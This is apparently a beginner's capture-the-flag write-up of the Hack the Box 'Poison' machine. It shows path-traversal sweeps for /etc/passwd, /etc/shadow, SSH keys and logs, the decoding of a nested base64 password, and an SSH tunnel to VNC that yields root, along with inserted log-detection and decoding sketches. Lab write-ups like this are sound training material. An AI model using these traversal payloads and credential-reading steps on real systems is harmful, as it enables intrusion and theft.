Introduction
I am a Hack the Box beginner. If you have any corrections, additions, or advice, please let me know in the comments or on Twitter. さんぽし (@sanpo_shiho) | Twitter
cheat sheet
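I keep notes on tool usage and similar topics in the cheat sheet below. Please use it as a reference. github | sanposhiho/MYCHEATSHEET
About the machine
This is my first medium-difficulty machine.
It is one of the easier machines among the mediums.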
nmap
kali@kali:~$ nmap -sV -sC 10.10.10.84
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-27 22:05 EDT
Nmap scan report for 10.10.10.84
Host is up (0.24s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2 (FreeBSD 20161230; protocol 2.0)
| ssh-hostkey:
| 2048 e3:3b:7d:3c:8f:4b:8c:f9:cd:7f:d2:3a:ce:2d:ff:bb (RSA)
| 256 4c:e8:c6:02:bd:fc:83:ff:c9:80:01:54:7d:22:81:72 (ECDSA)
|_ 256 0b:8f:d5:71:85:90:13:85:61:8b:eb:34:13:5f:94:3b (ED25519)
80/tcp open http Apache httpd 2.4.29 ((FreeBSD) PHP/5.6.32)
|_http-server-header: Apache/2.4.29 (FreeBSD) PHP/5.6.32
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
Service Info: OS: FreeBSD; CPE: cpe:/o:freebsd:freebsd
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 62.82 seconds
Port 80
I try typing in something at random.
This reeks of LFI...
LFI2RCE
https://github.com/takabaya-shi/LFI2RCE
kali@kali:~/LFI2RCE$ python lfi2rce.py --linux 10.10.10.84 /browse.php?file=../../../../../.. --error "failed to open stream" -v
_ _____ ___ ____ ____ ____ _____
| | | ___|_ _|___ \| _ \ / ___| ____|
| | | |_ | | __) | |_) | | | _|
| |___| _| | | / __/| _ <| |___| |___
|_____|_| |___|_____|_| \_\____|_____|
SSL Enabled: False
Verify SSL: False
Host: 10.10.10.84
Base Injection Path: /browse.php?file=../../../../../..
Terminator:
LFI path: http://10.10.10.84/browse.php?file=../../../../../..<INJECTION POINT>
Error Message: failed to open stream
Loaded 56 files
Progress: 0%
Testing http://10.10.10.84/browse.php?file=../../../../../../etc/passwd
LFI Success! /etc/passwd file found.
Progress: 1%
Testing http://10.10.10.84/browse.php?file=../../../../../../etc/shadow
Progress: 3%
Testing http://10.10.10.84/browse.php?file=../../../../../../etc/issue
Progress: 5%
Testing http://10.10.10.84/browse.php?file=../../../../../../etc/group
LFI Success! /etc/group file found.
Progress: 7%
Testing http://10.10.10.84/browse.php?file=../../../../../../etc/hostname
Progress: 8%
Testing http://10.10.10.84/browse.php?file=../../../../../../etc/ssh/ssh_config
LFI Success! /etc/ssh/ssh_config file found.
Progress: 10%
Testing http://10.10.10.84/browse.php?file=../../../../../../etc/ssh/sshd_config
LFI Success! /etc/ssh/sshd_config file found.
Progress: 12%
Testing http://10.10.10.84/browse.php?file=../../../../../../root/.ssh/id_rsa
Progress: 14%
Testing http://10.10.10.84/browse.php?file=../../../../../../root/.ssh/authorized_keys
Progress: 16%
Testing http://10.10.10.84/browse.php?file=../../../../../../home/None/.ssh/authorized_keys
Progress: 17%
Testing http://10.10.10.84/browse.php?file=../../../../../../home/None/.ssh/id_rsa
Progress: 19%
Testing http://10.10.10.84/browse.php?file=../../../../../../etc/apache2/apache2.conf
Progress: 21%
Testing http://10.10.10.84/browse.php?file=../../../../../../usr/local/etc/apache2/httpd.conf
Progress: 23%
Testing http://10.10.10.84/browse.php?file=../../../../../../etc/httpd/conf/httpd.conf
Progress: 25%
Testing http://10.10.10.84/browse.php?file=../../../../../../var/log/httpd/access_log
Progress: 26%
Testing http://10.10.10.84/browse.php?file=../../../../../../var/log/apache2/access.log
Progress: 28%
Testing http://10.10.10.84/browse.php?file=../../../../../../var/log/httpd-access.log
LFI Success! /var/log/httpd-access.log file found.
Progress: 30%
Testing http://10.10.10.84/browse.php?file=../../../../../../var/log/apache/access.log
Progress: 32%
Testing http://10.10.10.84/browse.php?file=../../../../../../var/log/apache/error.log
Progress: 33%
Testing http://10.10.10.84/browse.php?file=../../../../../../var/log/apache2/access.log
Progress: 35%
Testing http://10.10.10.84/browse.php?file=../../../../../../var/log/apache/error.log
Progress: 37%
Testing http://10.10.10.84/browse.php?file=../../../../../../var/lib/mysql/mysql/usr.frm
Progress: 39%
Testing http://10.10.10.84/browse.php?file=../../../../../../var/lib/mysql/user.MYD
Progress: 41%
Testing http://10.10.10.84/browse.php?file=../../../../../../var/lib/mysql/user.MYI
Progress: 42%
Testing http://10.10.10.84/browse.php?file=../../../../../../var/log/apache/logs/error.log
Progress: 44%
Testing http://10.10.10.84/browse.php?file=../../../../../../var/log/apache/logs/access.log
Progress: 46%
Testing http://10.10.10.84/browse.php?file=../../../../../../etc/httpd/logs/acces_log
Progress: 48%
Testing http://10.10.10.84/browse.php?file=../../../../../../etc/httpd/logs/acces.log
Progress: 50%
Testing http://10.10.10.84/browse.php?file=../../../../../../etc/httpd/logs/error_log
Progress: 51%
Testing http://10.10.10.84/browse.php?file=../../../../../../etc/httpd/logs/error.log
Progress: 53%
Testing http://10.10.10.84/browse.php?file=../../../../../../var/www/logs/access_log
Progress: 55%
Testing http://10.10.10.84/browse.php?file=../../../../../../var/www/logs/access.log
Progress: 57%
Testing http://10.10.10.84/browse.php?file=../../../../../../usr/local/apache/logs/access_log
Progress: 58%
Testing http://10.10.10.84/browse.php?file=../../../../../../usr/local/apache/logs/access.log
Progress: 60%
Testing http://10.10.10.84/browse.php?file=../../../../../../var/www/logs/error_log
Progress: 62%
Testing http://10.10.10.84/browse.php?file=../../../../../../var/www/logs/error.log
Progress: 64%
Testing http://10.10.10.84/browse.php?file=../../../../../../var/log/access_log
Progress: 66%
Testing http://10.10.10.84/browse.php?file=../../../../../../var/log/access.log
Progress: 67%
Testing http://10.10.10.84/browse.php?file=../../../../../../usr/local/apache/logs/error_log
Progress: 69%
Testing http://10.10.10.84/browse.php?file=../../../../../../usr/local/apache/logs/error.log
Progress: 71%
Testing http://10.10.10.84/browse.php?file=../../../../../../var/log/apache/error_log
Progress: 73%
Testing http://10.10.10.84/browse.php?file=../../../../../../var/log/apache2/error_log
Progress: 75%
Testing http://10.10.10.84/browse.php?file=../../../../../../var/log/error_log
Progress: 76%
Testing http://10.10.10.84/browse.php?file=../../../../../../var/log/error.log
Progress: 78%
Testing http://10.10.10.84/browse.php?file=../../../../../../proc/self/environ
Progress: 80%
Testing http://10.10.10.84/browse.php?file=../../../../../../var/log/vsftpd.log
Progress: 82%
Testing http://10.10.10.84/browse.php?file=../../../../../../var/log/sshd.log
Progress: 83%
Testing http://10.10.10.84/browse.php?file=../../../../../../var/log/auth.log
Progress: 85%
Testing http://10.10.10.84/browse.php?file=../../../../../../var/mail
Progress: 87%
Testing http://10.10.10.84/browse.php?file=../../../../../../var/spool/mail
Progress: 89%
Testing http://10.10.10.84/browse.php?file=../../../../../../var/spool/mail/rpc
Progress: 91%
Testing http://10.10.10.84/browse.php?file=../../../../../../var/mail/rpc
Progress: 92%
Testing http://10.10.10.84/browse.php?file=../../../../../../var/mail/root
Progress: 94%
Testing http://10.10.10.84/browse.php?file=../../../../../../var/spool/mail/root
Progress: 96%
Testing http://10.10.10.84/browse.php?file=../../../../../../var/mail/None
Progress: 98%
Testing http://10.10.10.84/browse.php?file=../../../../../../var/spool/mail/None
Following files found!!!
/etc/passwd
/etc/group
/etc/ssh/ssh_config
/etc/ssh/sshd_config
/var/log/httpd-access.log
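Seen from the server side, the sweep above leaves a recognizable pattern in the Apache access log: one client requesting browse.php with many different ../ targets. The following Python detection sketch is an added example, not part of the original post or of LFI2RCE; the log lines are constructed, and the combined log format and the threshold of three distinct files are assumptions.

```python
import posixpath
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Apache "combined" format: ip ident user [time] "METHOD target PROTO" status ...
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<target>\S+) [^"]*" \d{3} ')

def decode_fully(value, rounds=3):
    """Undo nested URL-encoding (bounded) so %252e%252e%252f is seen as ../"""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value.replace("\\", "/")

def traversal_hits(target):
    """Yield (parameter, resolved path) for query values that climb directories."""
    for name, raw in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        value = decode_fully(raw)
        if "../" in value or value.startswith("/"):
            # Resolve as if the traversal reached the filesystem root (assumption).
            yield name, posixpath.normpath("/" + value.lstrip("/"))

def detect(lines, sweep_threshold=3):
    """Group traversal requests per client; many distinct files means a wordlist sweep."""
    clients = {}
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        for _name, path in traversal_hits(m["target"]):
            clients.setdefault(m["ip"], set()).add(path)
    return {ip: {"files": sorted(paths), "sweep": len(paths) >= sweep_threshold}
            for ip, paths in clients.items()}

def sample_line(ip, target):
    # Constructed log line (documentation IP ranges), not taken from a real log.
    return f'{ip} - - [27/May/2020:22:10:00 -0400] "GET {target} HTTP/1.1" 200 512 "-" "-"'

SAMPLE = [
    sample_line("198.51.100.23", "/browse.php?file=listfiles.php"),
    sample_line("198.51.100.23", "/browse.php?file=../../../../../../etc/passwd"),
    sample_line("198.51.100.23", "/browse.php?file=../../../../../../etc/shadow"),
    sample_line("198.51.100.23", "/browse.php?file=%252e%252e%252f%252e%252e%252fvar%252flog%252fhttpd-access.log"),
    sample_line("192.0.2.7", "/index.php"),
    sample_line("192.0.2.7", "/browse.php?file=../ini.php"),
]

if __name__ == "__main__":
    for ip, info in detect(SAMPLE).items():
        print(ip, info)
```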
/etc/passwd
listfiles.php
It says "Sites to be tested: ini.php, info.php, listfiles.php, phpinfo.php".
I open listfiles.php.
pwdbackup.txt looks suspicious.
Decoding pwdbackup.txt
This password is secure, it's encoded atleast 13 times.. what could go wrong really.. Vm0wd2QyUXlVWGxWV0d4WFlURndVRlpzWkZOalJsWjBUVlpPV0ZKc2JETlhhMk0xVmpKS1IySkVU bGhoTVVwVVZtcEdZV015U2tWVQpiR2hvVFZWd1ZWWnRjRWRUTWxKSVZtdGtXQXBpUm5CUFdWZDBS bVZHV25SalJYUlVUVlUxU1ZadGRGZFZaM0JwVmxad1dWWnRNVFJqCk1EQjRXa1prWVZKR1NsVlVW M040VGtaa2NtRkdaR2hWV0VKVVdXeGFTMVZHWkZoTlZGSlRDazFFUWpSV01qVlRZVEZLYzJOSVRs WmkKV0doNlZHeGFZVk5IVWtsVWJXaFdWMFZLVlZkWGVHRlRNbEY0VjI1U2ExSXdXbUZEYkZwelYy eG9XR0V4Y0hKWFZscExVakZPZEZKcwpaR2dLWVRCWk1GWkhkR0ZaVms1R1RsWmtZVkl5YUZkV01G WkxWbFprV0dWSFJsUk5WbkJZVmpKMGExWnRSWHBWYmtKRVlYcEdlVmxyClVsTldNREZ4Vm10NFYw MXVUak5hVm1SSFVqRldjd3BqUjJ0TFZXMDFRMkl4WkhOYVJGSlhUV3hLUjFSc1dtdFpWa2w1WVVa T1YwMUcKV2t4V2JGcHJWMGRXU0dSSGJFNWlSWEEyVmpKMFlXRXhXblJTV0hCV1ltczFSVmxzVm5k WFJsbDVDbVJIT1ZkTlJFWjRWbTEwTkZkRwpXbk5qUlhoV1lXdGFVRmw2UmxkamQzQlhZa2RPVEZk WGRHOVJiVlp6VjI1U2FsSlhVbGRVVmxwelRrWlplVTVWT1ZwV2EydzFXVlZhCmExWXdNVWNLVjJ0 NFYySkdjR2hhUlZWNFZsWkdkR1JGTldoTmJtTjNWbXBLTUdJeFVYaGlSbVJWWVRKb1YxbHJWVEZT Vm14elZteHcKVG1KR2NEQkRiVlpJVDFaa2FWWllRa3BYVmxadlpERlpkd3BOV0VaVFlrZG9hRlZz WkZOWFJsWnhVbXM1YW1RelFtaFZiVEZQVkVaawpXR1ZHV210TmJFWTBWakowVjFVeVNraFZiRnBW VmpOU00xcFhlRmRYUjFaSFdrWldhVkpZUW1GV2EyUXdDazVHU2tkalJGbExWRlZTCmMxSkdjRFpO Ukd4RVdub3dPVU5uUFQwSwo=
Being a brute-force kind of person, I simply apply base64 -d 13 times.
kali@kali:~$ cat pwd.txt | tr -d ' ' | base64 -d |base64 -d |base64 -d |base64 -d |base64 -d |base64 -d |base64 -d |base64 -d |base64 -d |base64 -d |base64 -d |base64 -d |base64 -d
Charix!2#4%6&8(0
Out it comes.
Looking at the /etc/passwd from earlier, there is a user named charix, so this is probably that user's password.
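The thirteen chained base64 -d calls above can be replaced by a loop that strips layers until the data stops being base64, which also shows that the number of layers adds no secrecy. This Python sketch is an added example, not code from the original post; the secret and the nested blob are constructed here, and the "decodes to printable text" stop condition is a heuristic assumption.

```python
import base64
import binascii
import string

PRINTABLE = set(string.printable.encode())

def peel_base64(blob, max_layers=64):
    """Remove base64 layers until the data no longer decodes to printable text.

    Returns (innermost bytes, number of layers removed)."""
    data, layers = blob, 0
    while layers < max_layers:
        compact = b"".join(data.split())      # drop spaces and line wraps
        try:
            decoded = base64.b64decode(compact, validate=True)
        except (binascii.Error, ValueError):
            break                              # not base64: data is the innermost value
        if not decoded or not set(decoded) <= PRINTABLE:
            break                              # decodes to binary noise: stop here
        data, layers = decoded, layers + 1
    return data, layers

def nest(secret, layers):
    """Build a constructed test blob the way repeated `base64` calls would."""
    for _ in range(layers):
        secret = base64.encodebytes(secret)    # wraps lines like the CLI tool
    return secret

# Constructed sample value, not the password from this machine.
SECRET = b"Constructed sample: not-a-real-password!"

if __name__ == "__main__":
    plaintext, count = peel_base64(nest(SECRET, 13))
    print(count, plaintext.decode())
```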
ssh
kali@kali:~$ ssh charix@10.10.10.84
The authenticity of host '10.10.10.84 (10.10.10.84)' can't be established.
ECDSA key fingerprint is SHA256:rhYtpHzkd9nBmOtN7+ft0JiVAu8qnywLb48Glz4jZ8c.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.84' (ECDSA) to the list of known hosts.
Password for charix@Poison:
Last login: Mon Mar 19 16:38:00 2018 from 10.10.14.4
FreeBSD 11.1-RELEASE (GENERIC) #0 r321309: Fri Jul 21 02:08:28 UTC 2017
Welcome to FreeBSD!
Release Notes, Errata: https://www.FreeBSD.org/releases/
Security Advisories: https://www.FreeBSD.org/security/
FreeBSD Handbook: https://www.FreeBSD.org/handbook/
FreeBSD FAQ: https://www.FreeBSD.org/faq/
Questions List: https://lists.FreeBSD.org/mailman/listinfo/freebsd-questions/
FreeBSD Forums: https://forums.FreeBSD.org/
Documents installed with the system are in the /usr/local/share/doc/freebsd/
directory, or can be installed later with: pkg install en-freebsd-doc
For other languages, replace "en" with a language code like de or fr.
Show the version of FreeBSD installed: freebsd-version ; uname -a
Please include that output and any error messages when posting questions.
Introduction to manual pages: man man
FreeBSD directory layout: man hier
Edit /etc/motd to change this login announcement.
To repeat the last command in the C shell, type "!!".
-- Dru <[email protected]>
charix@Poison:~ %
This gets user.txt.
Enumeration
charix@Poison:~ % ls
secret.zip user.txt
charix@Poison:~ % unzip secret.zip
Archive: secret.zip
extracting: secret |
unzip: Passphrase required for this entry
It asks for a passphrase, but I could not figure out how to specify a password with FreeBSD's unzip, so I copy the file to kali with scp.
kali@kali:~$ scp charix@10.10.10.84:~/secret.zip ./
Password for charix@Poison:
secret.zip 100% 166 0.7KB/s 00:00
kali@kali:~$ unzip secret.zip
Archive: secret.zip
[secret.zip] secret password:
extracting: secret
kali@kali:~$ file secret
secret: Non-ISO extended-ASCII text, with no line terminators
What came out of the unzip was a mystery file that I could not really read.
Using sockstat
sockstat is apparently a command similar to ss on Linux.
charix@Poison:~ % sockstat -4 -l -P tcp
USER COMMAND PID FD PROTO LOCAL ADDRESS FOREIGN ADDRESS
www httpd 782 4 tcp4 *:80 *:*
www httpd 774 4 tcp4 *:80 *:*
root sendmail 657 3 tcp4 127.0.0.1:25 *:*
www httpd 656 4 tcp4 *:80 *:*
www httpd 655 4 tcp4 *:80 *:*
www httpd 654 4 tcp4 *:80 *:*
www httpd 653 4 tcp4 *:80 *:*
www httpd 652 4 tcp4 *:80 *:*
root httpd 638 4 tcp4 *:80 *:*
root sshd 620 4 tcp4 *:22 *:*
root Xvnc 529 1 tcp4 127.0.0.1:5901 *:*
root Xvnc 529 3 tcp4 127.0.0.1:5801 *:*
Ports 5901 and 5801 look somewhat suspicious.
reverse SSH tunnel
https://github.com/sanposhiho/MY_CHEAT_SHEET/blob/master/Linux/linux_commands.md#reverse-ssh-tunnel
kali@kali:~$ ssh -L 5901:localhost:5901 charix@10.10.10.84
Also, 5901 is apparently a port commonly used by something called VNC. http://www14.plala.or.jp/campus-note/vine_linux/server_vnc/vnc_portforwarding.html
I connect with the vncviewer command.
Charix!2#4%6&8(0 did not work here.
I use the secret file from earlier.
kali@kali:~$ vncviewer localhost:5901 -passwd secret
Connected to RFB server, using protocol version 3.8
Enabling TightVNC protocol extensions
Performing standard VNC authentication
Authentication successful
Desktop name "root's X desktop (Poison:1)"
VNC server default format:
32 bits per pixel.
Least significant byte first in each pixel.
True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Using default colormap which is TrueColor. Pixel format:
32 bits per pixel.
Least significant byte first in each pixel.
True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Same machine: preferring raw encoding
Got root!
Conclusion
It is one of the easier medium machines, but I am glad I got all the way to root. 🏃‍♂️